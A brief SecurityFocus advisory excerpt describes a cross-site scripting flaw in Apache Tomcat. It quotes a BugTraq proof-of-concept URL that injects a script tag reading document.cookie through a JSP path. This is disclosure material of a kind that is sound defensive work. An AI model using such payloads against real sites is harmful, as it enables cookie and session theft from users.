Apache Tomcat Cross-Site Scripting Vulnerability

TAKAGI, Hiromitsu provided the following example in his BugTraq posting:

http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp


 

Privacy Statement
Copyright 2010, SecurityFocus